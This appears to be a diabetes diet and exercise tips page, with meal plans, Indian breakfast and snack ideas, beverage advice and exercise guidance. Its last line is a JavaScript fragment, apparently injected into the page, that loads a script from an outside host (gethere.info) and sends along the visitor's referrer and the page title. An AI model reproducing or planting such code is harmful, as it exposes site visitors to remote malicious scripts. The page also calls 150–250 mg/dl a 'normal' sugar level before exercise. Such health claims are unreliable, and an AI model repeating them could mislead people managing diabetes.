I .Meal Planning
- Eat smaller , more frequent meals
- Control carbs
- Ensure variety in diet – whole grain foods, fruits and vegetables daily
- Limit fats – 3-4 tsp/day
- Seasoning tips—use salt sparingly, avoid adding sugars.
II.Practical tips to make you meals healthier
- Eat lots of fruits and vegetables- Except for few fruits like banana, mango, chickoo, jackfruit and grapes, and vegetables like potatoes,sweet potatoes , yam . ,both fruits and veggies are cornerstone of diabetes,- gives you – vitamins, minerals and antioxidants.
- Eat more whole grains- brown rice, ragi, bajra , jowar,wheat
- Use healthy fats and oils- Choose- MUFA’s – olive oil, canola oil , less often use PUFA- corn , sesame and safflower oil. Minimise SFA- high fat meat , dairy, coconut,
- Choose heart healthy proteins- beans, peas and dals (good source of protein and fibre), Eat fish and shell fish 2-3times/weel, choose skinless, white chicken, nuts in moderation ( almonds , walnuts)
- Select low fat dairy products- skim milk and its products like curd, paneer and low fat cheese
III.Healthy breakfast choices
- An egg white omelette with a bran paratha and fruit wedges
- Oats with low fat milk and spirinkling nuts and fruits
- Dalia and veggies upma with a bowl of fresh fruits
- Oats dosa with mint chutney and orange segments
- Ragi porridge with milk/buttermilk and a whole fresh fruits.
IV.Healthy lunch box ideas
- Healthysandwhich – brown bread with veggies no potato, low fat butter and cheese
- Salad warps- mix veg salads in a wheat chapatti
- Spinach and oats paratha
- Brown rice veggie pulao.
V.Snacking ideas to keep blood glucose in check
- Handful of nuts – 7-8 almonds and walnuts
- Raw veggies
- Vegetable soups
- Fruit bowl
- Cereal chivdabhel
- Wrap- salads,/ rajma with salsa sauce.
VI.Choose your bevarages wisely
- Stay away from, sugary drink, carbonated beverages, tea and coffee with sugar, syrup based drinks.
- Choose from – plain water, unsweetened tea and coffee, low fat milk drink, green tea.
Why is Exercise imp-
- Improves blood glucose control
- Improves energy levels.
- Helps to lose weight and maintain body weight
- Helps in preventing Diabetes complication.
- Improves mental health by reducing stress,
- Strengthens bone and muscles
You can do flexibility exercise like stretching, yoga, Aerobic exercise(brisk walk, dance, swimming, cycling etc), Strength training,.
Exercise should be performed 1-3hrs post meals, avoid workout at bed time to avoid hypoglycemia. (Do remember to hydrate yourself throughout workout)
Before exercise – make sure your sugar levels are normal – between 150mg/dl- 250mg/dl.
For Further support in managing your sugars you can check my profile and contact me.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;